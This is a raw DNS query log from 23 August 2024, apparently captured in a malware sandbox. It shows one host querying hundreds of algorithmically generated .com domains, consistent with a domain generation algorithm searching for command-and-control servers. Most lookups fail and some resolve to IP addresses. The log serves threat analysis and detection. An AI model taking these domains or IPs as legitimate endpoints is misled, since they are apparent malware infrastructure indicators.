Aug 23, 2024 18:48:57.865191936 CEST	1.1.1.1	192.168.2.4	0xb591	Name error (3)	galyvaw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.865204096 CEST	1.1.1.1	192.168.2.4	0xa711	Name error (3)	lysytyn.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.865212917 CEST	1.1.1.1	192.168.2.4	0x5004	Name error (3)	qedytyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.867208004 CEST	1.1.1.1	192.168.2.4	0x1e31	Name error (3)	vonyjuc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.872415066 CEST	1.1.1.1	192.168.2.4	0x5097	Name error (3)	ganyhus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.875489950 CEST	1.1.1.1	192.168.2.4	0x1433	Name error (3)	lykyvor.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.876313925 CEST	1.1.1.1	192.168.2.4	0x3241	Name error (3)	qebyhuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.876324892 CEST	1.1.1.1	192.168.2.4	0x65e2	Name error (3)	gatyrah.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.881313086 CEST	1.1.1.1	192.168.2.4	0xdb3d	Name error (3)	pujycil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.881412983 CEST	1.1.1.1	192.168.2.4	0xb2f1	Name error (3)	lyvygyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.881423950 CEST	1.1.1.1	192.168.2.4	0x56f	Name error (3)	gahycuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.882623911 CEST	1.1.1.1	192.168.2.4	0xf935	Name error (3)	pumyjip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.882635117 CEST	1.1.1.1	192.168.2.4	0x1e56	Name error (3)	qetyraq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.885997057 CEST	1.1.1.1	192.168.2.4	0x62a9	Name error (3)	vocygef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.888442993 CEST	1.1.1.1	192.168.2.4	0xaca5	Name error (3)	gacyfeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.893853903 CEST	1.1.1.1	192.168.2.4	0xa4fb	Name error (3)	qegyxup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.896548986 CEST	1.1.1.1	192.168.2.4	0xbec1	Name error (3)	vopyrem.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.906037092 CEST	1.1.1.1	192.168.2.4	0x2fc3	Name error (3)	vowyqik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.909817934 CEST	1.1.1.1	192.168.2.4	0x9697	Name error (3)	lyrywoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.911334038 CEST	1.1.1.1	192.168.2.4	0x921d	Name error (3)	purywoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.915796995 CEST	1.1.1.1	192.168.2.4	0x8dc9	Name error (3)	lygyxux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.926270008 CEST	1.1.1.1	192.168.2.4	0xaaa	Name error (3)	puzydog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.927311897 CEST	1.1.1.1	192.168.2.4	0x7960	Name error (3)	vofyzyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.930680037 CEST	1.1.1.1	192.168.2.4	0xcfa	Name error (3)	qexyfag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.932375908 CEST	1.1.1.1	192.168.2.4	0x6325	Name error (3)	gaqyqiw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.938393116 CEST	1.1.1.1	192.168.2.4	0xbf17	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.938393116 CEST	1.1.1.1	192.168.2.4	0xbf17	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.939049959 CEST	1.1.1.1	192.168.2.4	0x5190	Name error (3)	puvyxil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.939450026 CEST	1.1.1.1	192.168.2.4	0x979	Name error (3)	purydyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.939460993 CEST	1.1.1.1	192.168.2.4	0x1b87	Name error (3)	lyryfyd.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.942409992 CEST	1.1.1.1	192.168.2.4	0x2a36	Name error (3)	qegyqaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.943295956 CEST	1.1.1.1	192.168.2.4	0x71ce	Name error (3)	lyxyfan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.943306923 CEST	1.1.1.1	192.168.2.4	0xe481	Name error (3)	gacyzuz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.945914984 CEST	1.1.1.1	192.168.2.4	0x7e4a	Name error (3)	vowydef.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.947911978 CEST	1.1.1.1	192.168.2.4	0x13d0	Name error (3)	lygymoj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.950139999 CEST	1.1.1.1	192.168.2.4	0xc28b	Name error (3)	qeqyqul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.950151920 CEST	1.1.1.1	192.168.2.4	0x165e	Name error (3)	lyxylux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.953672886 CEST	1.1.1.1	192.168.2.4	0x8323	Name error (3)	gaqydeb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.959853888 CEST	1.1.1.1	192.168.2.4	0x6de8	Name error (3)	vofymik.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.962987900 CEST	1.1.1.1	192.168.2.4	0x271c	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.963170052 CEST	1.1.1.1	192.168.2.4	0xc7	Name error (3)	qeqysag.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.966425896 CEST	1.1.1.1	192.168.2.4	0xfc95	Name error (3)	lymysan.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.966814995 CEST	1.1.1.1	192.168.2.4	0xcc6b	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.966830969 CEST	1.1.1.1	192.168.2.4	0xfa98	Name error (3)	volykyc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.970161915 CEST	1.1.1.1	192.168.2.4	0x52e3	Name error (3)	qexylup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.974149942 CEST	1.1.1.1	192.168.2.4	0xeabf	Name error (3)	pufymoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:57.986751080 CEST	1.1.1.1	192.168.2.4	0x1714	Name error (3)	qedynul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.018047094 CEST	1.1.1.1	192.168.2.4	0xedf1	Name error (3)	qekyvol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.034877062 CEST	1.1.1.1	192.168.2.4	0xb474	No error (0)	vojyqem.com		172.234.222.143	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.034877062 CEST	1.1.1.1	192.168.2.4	0xb474	No error (0)	vojyqem.com		172.234.222.138	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.066328049 CEST	1.1.1.1	192.168.2.4	0x2067	Name error (3)	pufyxyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.099342108 CEST	1.1.1.1	192.168.2.4	0xc2b6	Name error (3)	pumypog.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.132002115 CEST	1.1.1.1	192.168.2.4	0xfdfb	No error (0)	vocyzit.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.138128996 CEST	1.1.1.1	192.168.2.4	0x451e	No error (0)	qetyfuv.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.148657084 CEST	1.1.1.1	192.168.2.4	0x56ee	No error (0)	lyvyxor.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.161839962 CEST	1.1.1.1	192.168.2.4	0x2610	Name error (3)	galykes.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.168580055 CEST	1.1.1.1	192.168.2.4	0xdaa9	Name error (3)	lysynur.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.173589945 CEST	1.1.1.1	192.168.2.4	0xa2eb	Name error (3)	qekykev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.174504042 CEST	1.1.1.1	192.168.2.4	0xa8f5	Name error (3)	pupybul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.194865942 CEST	1.1.1.1	192.168.2.4	0xf744	Name error (3)	lykyjad.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.196686029 CEST	1.1.1.1	192.168.2.4	0xe16d	Name error (3)	ganypih.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.206887007 CEST	1.1.1.1	192.168.2.4	0x297a	Name error (3)	vopybyt.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.376822948 CEST	1.1.1.1	192.168.2.4	0x6f16	No error (0)	vonypom.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.409149885 CEST	1.1.1.1	192.168.2.4	0x46a3	Name error (3)	lyvytuj.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.410144091 CEST	1.1.1.1	192.168.2.4	0xc569	Name error (3)	qetyvep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.410155058 CEST	1.1.1.1	192.168.2.4	0x5318	Name error (3)	vojyjof.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.413777113 CEST	1.1.1.1	192.168.2.4	0x4945	Name error (3)	lyryvex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.416546106 CEST	1.1.1.1	192.168.2.4	0x376c	Name error (3)	qebytiq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.416557074 CEST	1.1.1.1	192.168.2.4	0x1a06	Name error (3)	vocyruk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.419575930 CEST	1.1.1.1	192.168.2.4	0x1abf	Name error (3)	gacyryw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.426805019 CEST	1.1.1.1	192.168.2.4	0x6f0c	Name error (3)	qexyryl.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.430423021 CEST	1.1.1.1	192.168.2.4	0xaf4d	Name error (3)	vofygum.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.430435896 CEST	1.1.1.1	192.168.2.4	0x7614	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.430435896 CEST	1.1.1.1	192.168.2.4	0x7614	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.436914921 CEST	1.1.1.1	192.168.2.4	0xd6f2	Name error (3)	gatyvyz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.436924934 CEST	1.1.1.1	192.168.2.4	0x6f89	Name error (3)	puvytuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.437220097 CEST	1.1.1.1	192.168.2.4	0xc933	Name error (3)	gadyfuh.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.440869093 CEST	1.1.1.1	192.168.2.4	0x126a	Name error (3)	gahyhob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.440880060 CEST	1.1.1.1	192.168.2.4	0xe9ad	Name error (3)	puzywel.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.440893888 CEST	1.1.1.1	192.168.2.4	0xff7	Name error (3)	pujyjav.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.440902948 CEST	1.1.1.1	192.168.2.4	0xbe1	Name error (3)	purycap.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.444044113 CEST	1.1.1.1	192.168.2.4	0x8ef2	Name error (3)	pumyxiv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.444055080 CEST	1.1.1.1	192.168.2.4	0xe05d	No error (0)	lysyfyj.com		69.162.80.59	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.444063902 CEST	1.1.1.1	192.168.2.4	0x7ab	Name error (3)	volyqat.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.449031115 CEST	1.1.1.1	192.168.2.4	0x1750	Name error (3)	qedyfyq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.449042082 CEST	1.1.1.1	192.168.2.4	0xebd8	Name error (3)	qekyqop.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.449052095 CEST	1.1.1.1	192.168.2.4	0x82c7	Name error (3)	lygygin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.449060917 CEST	1.1.1.1	192.168.2.4	0xdd72	Name error (3)	vowycac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.449069977 CEST	1.1.1.1	192.168.2.4	0xcf2	Name error (3)	volybak.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.449081898 CEST	1.1.1.1	192.168.2.4	0x662e	Name error (3)	gaqycos.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.452056885 CEST	1.1.1.1	192.168.2.4	0x746e	Name error (3)	lyxywer.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.452066898 CEST	1.1.1.1	192.168.2.4	0xbea3	Name error (3)	qeqyxov.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.452075958 CEST	1.1.1.1	192.168.2.4	0x5128	No error (0)	puzylyp.com		3.64.163.50	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.452085972 CEST	1.1.1.1	192.168.2.4	0xc266	No error (0)	gahyqah.com		162.255.119.102	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.452085972 CEST	1.1.1.1	192.168.2.4	0xc266	No error (0)	gahyqah.com		23.253.46.64	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.456124067 CEST	1.1.1.1	192.168.2.4	0x8299	Name error (3)	pufygug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.464660883 CEST	1.1.1.1	192.168.2.4	0xc813	Name error (3)	vonyzuf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.470576048 CEST	1.1.1.1	192.168.2.4	0xdb0	Name error (3)	vojycit.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.530714989 CEST	1.1.1.1	192.168.2.4	0x33ef	No error (0)	galyqaz.com		199.191.50.83	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.536432028 CEST	1.1.1.1	192.168.2.4	0xd220	No error (0)	qegyhig.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.536432028 CEST	1.1.1.1	192.168.2.4	0xd220	No error (0)	qegyhig.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.544258118 CEST	1.1.1.1	192.168.2.4	0xd6d1	No error (0)	gatyfus.com		178.162.203.202	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.544258118 CEST	1.1.1.1	192.168.2.4	0xd6d1	No error (0)	gatyfus.com		178.162.203.211	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.544258118 CEST	1.1.1.1	192.168.2.4	0xd6d1	No error (0)	gatyfus.com		178.162.203.226	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.544258118 CEST	1.1.1.1	192.168.2.4	0xd6d1	No error (0)	gatyfus.com		178.162.217.107	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.544258118 CEST	1.1.1.1	192.168.2.4	0xd6d1	No error (0)	gatyfus.com		5.79.71.205	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.544258118 CEST	1.1.1.1	192.168.2.4	0xd6d1	No error (0)	gatyfus.com		5.79.71.225	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.544258118 CEST	1.1.1.1	192.168.2.4	0xd6d1	No error (0)	gatyfus.com		85.17.31.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.544258118 CEST	1.1.1.1	192.168.2.4	0xd6d1	No error (0)	gatyfus.com		85.17.31.122	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.595495939 CEST	1.1.1.1	192.168.2.4	0xbcfa	Name error (3)	puvygyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.618653059 CEST	1.1.1.1	192.168.2.4	0xf1bf	No error (0)	lymyxid.com		3.94.10.34	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.631315947 CEST	1.1.1.1	192.168.2.4	0xaf4f	No error (0)	qetyfuv.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.641598940 CEST	1.1.1.1	192.168.2.4	0x5ece	No error (0)	vonypom.com		18.208.156.248	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.691643953 CEST	1.1.1.1	192.168.2.4	0xd160	No error (0)	lyvyxor.com		208.100.26.245	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.756923914 CEST	1.1.1.1	192.168.2.4	0x19a3	No error (0)	galyqaz.com		199.191.50.83	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.770108938 CEST	1.1.1.1	192.168.2.4	0x2e18	No error (0)	vocyzit.com		44.221.84.105	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.802073002 CEST	1.1.1.1	192.168.2.4	0xbe70	No error (0)	vojyqem.com		172.234.222.143	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.802073002 CEST	1.1.1.1	192.168.2.4	0xbe70	No error (0)	vojyqem.com		172.234.222.138	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:58.883096933 CEST	1.1.1.1	192.168.2.4	0x64a3	No error (0)	lymyxid.com		3.94.10.34	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:59.113429070 CEST	1.1.1.1	192.168.2.4	0xe0fd	No error (0)	lysyfyj.com		69.162.80.58	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:59.339766979 CEST	1.1.1.1	192.168.2.4	0xa02f	No error (0)	gatyfus.com		85.17.31.122	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:59.339766979 CEST	1.1.1.1	192.168.2.4	0xa02f	No error (0)	gatyfus.com		178.162.203.202	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:59.339766979 CEST	1.1.1.1	192.168.2.4	0xa02f	No error (0)	gatyfus.com		178.162.203.211	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:59.339766979 CEST	1.1.1.1	192.168.2.4	0xa02f	No error (0)	gatyfus.com		178.162.203.226	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:59.339766979 CEST	1.1.1.1	192.168.2.4	0xa02f	No error (0)	gatyfus.com		178.162.217.107	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:59.339766979 CEST	1.1.1.1	192.168.2.4	0xa02f	No error (0)	gatyfus.com		5.79.71.205	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:59.339766979 CEST	1.1.1.1	192.168.2.4	0xa02f	No error (0)	gatyfus.com		5.79.71.225	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:59.339766979 CEST	1.1.1.1	192.168.2.4	0xa02f	No error (0)	gatyfus.com		85.17.31.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:48:59.369992018 CEST	1.1.1.1	192.168.2.4	0x40c2	No error (0)	www.gahyqah.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 23, 2024 18:48:59.369992018 CEST	1.1.1.1	192.168.2.4	0x40c2	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:00.602802038 CEST	1.1.1.1	192.168.2.4	0x70d1	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:00.605423927 CEST	1.1.1.1	192.168.2.4	0x70d1	No error (0)	gadyniw.com		154.212.231.82	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.314973116 CEST	1.1.1.1	192.168.2.4	0x38c7	Name error (3)	ganyzub.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.316840887 CEST	1.1.1.1	192.168.2.4	0xfed	Name error (3)	lykymox.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.316864967 CEST	1.1.1.1	192.168.2.4	0x1aba	Name error (3)	vopydek.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.317944050 CEST	1.1.1.1	192.168.2.4	0x6425	Name error (3)	pujymip.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.317955017 CEST	1.1.1.1	192.168.2.4	0x2b53	Name error (3)	gatydaw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.327116966 CEST	1.1.1.1	192.168.2.4	0x98c9	Name error (3)	vocykem.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.327192068 CEST	1.1.1.1	192.168.2.4	0xb349	Name error (3)	puzyjoq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.327202082 CEST	1.1.1.1	192.168.2.4	0x7154	Name error (3)	qetysal.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.327322006 CEST	1.1.1.1	192.168.2.4	0xd1f0	Name error (3)	pufybyv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.327332020 CEST	1.1.1.1	192.168.2.4	0x37e6	Name error (3)	gadyveb.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.329741001 CEST	1.1.1.1	192.168.2.4	0x8432	Name error (3)	volyjok.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.329751015 CEST	1.1.1.1	192.168.2.4	0x8f49	Name error (3)	lymytux.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.329758883 CEST	1.1.1.1	192.168.2.4	0x7426	Name error (3)	galyhiw.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.329767942 CEST	1.1.1.1	192.168.2.4	0x4847	Name error (3)	vonyryc.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.330019951 CEST	1.1.1.1	192.168.2.4	0xdf6c	Name error (3)	qekyhil.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.331509113 CEST	1.1.1.1	192.168.2.4	0xba52	Name error (3)	ganyrys.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.331518888 CEST	1.1.1.1	192.168.2.4	0x8d4c	Name error (3)	lyvywed.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.331526995 CEST	1.1.1.1	192.168.2.4	0xa207	Name error (3)	qebyrev.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.332973003 CEST	1.1.1.1	192.168.2.4	0x3dd5	Name error (3)	qebylug.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.332988977 CEST	1.1.1.1	192.168.2.4	0x1380	Name error (3)	vojygut.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.334167957 CEST	1.1.1.1	192.168.2.4	0x6e16	Name error (3)	vowyzuk.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.334178925 CEST	1.1.1.1	192.168.2.4	0x612e	Name error (3)	lyryxij.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.334757090 CEST	1.1.1.1	192.168.2.4	0xf988	Name error (3)	lygyfex.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.334768057 CEST	1.1.1.1	192.168.2.4	0x8ec8	Name error (3)	qegyfyp.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.335485935 CEST	1.1.1.1	192.168.2.4	0x8bd8	Name error (3)	puryxuq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.335498095 CEST	1.1.1.1	192.168.2.4	0xd9e1	Name error (3)	gacyqob.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.335746050 CEST	1.1.1.1	192.168.2.4	0xd3b3	Name error (3)	vofydac.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.335937977 CEST	1.1.1.1	192.168.2.4	0xddb0	Name error (3)	pufydep.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.336170912 CEST	1.1.1.1	192.168.2.4	0xed7a	Name error (3)	lyxymin.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.336287975 CEST	1.1.1.1	192.168.2.4	0x26a3	Name error (3)	puzymig.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.337342978 CEST	1.1.1.1	192.168.2.4	0x3e00	Name error (3)	gadydas.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.344126940 CEST	1.1.1.1	192.168.2.4	0xc0f2	No error (0)	lysyvan.com		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.344126940 CEST	1.1.1.1	192.168.2.4	0xc0f2	No error (0)	lysyvan.com		188.114.96.3	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.346472025 CEST	1.1.1.1	192.168.2.4	0xc375	Name error (3)	vowypit.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.346601009 CEST	1.1.1.1	192.168.2.4	0xf7fa	Name error (3)	pumytup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.346914053 CEST	1.1.1.1	192.168.2.4	0xc46a	Name error (3)	puvylyg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.347012997 CEST	1.1.1.1	192.168.2.4	0x2832	Name error (3)	gaqypiz.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.347023010 CEST	1.1.1.1	192.168.2.4	0xb9b7	Name error (3)	qeqytup.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.347158909 CEST	1.1.1.1	192.168.2.4	0x7691	Name error (3)	qegynuv.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.347167969 CEST	1.1.1.1	192.168.2.4	0x39e3	Name error (3)	lygynud.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.347176075 CEST	1.1.1.1	192.168.2.4	0xd76e	Name error (3)	purypol.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.347487926 CEST	1.1.1.1	192.168.2.4	0xa1da	Name error (3)	qedyveg.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.355380058 CEST	1.1.1.1	192.168.2.4	0x1663	Name error (3)	pujygul.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.355482101 CEST	1.1.1.1	192.168.2.4	0x6cbb	Name error (3)	vofybyf.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.355493069 CEST	1.1.1.1	192.168.2.4	0xf53e	Name error (3)	gahynus.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.358375072 CEST	1.1.1.1	192.168.2.4	0x9a8b	Name error (3)	qexykaq.com	none	none	A (IP address)	IN (0x0001)	false
Aug 23, 2024 18:49:04.358383894 CEST	1.1.1.1	192.168.2.4	0x795f	Name error (3)	gatycoh.com	none	none	A (IP address)	IN (0x0001)	false
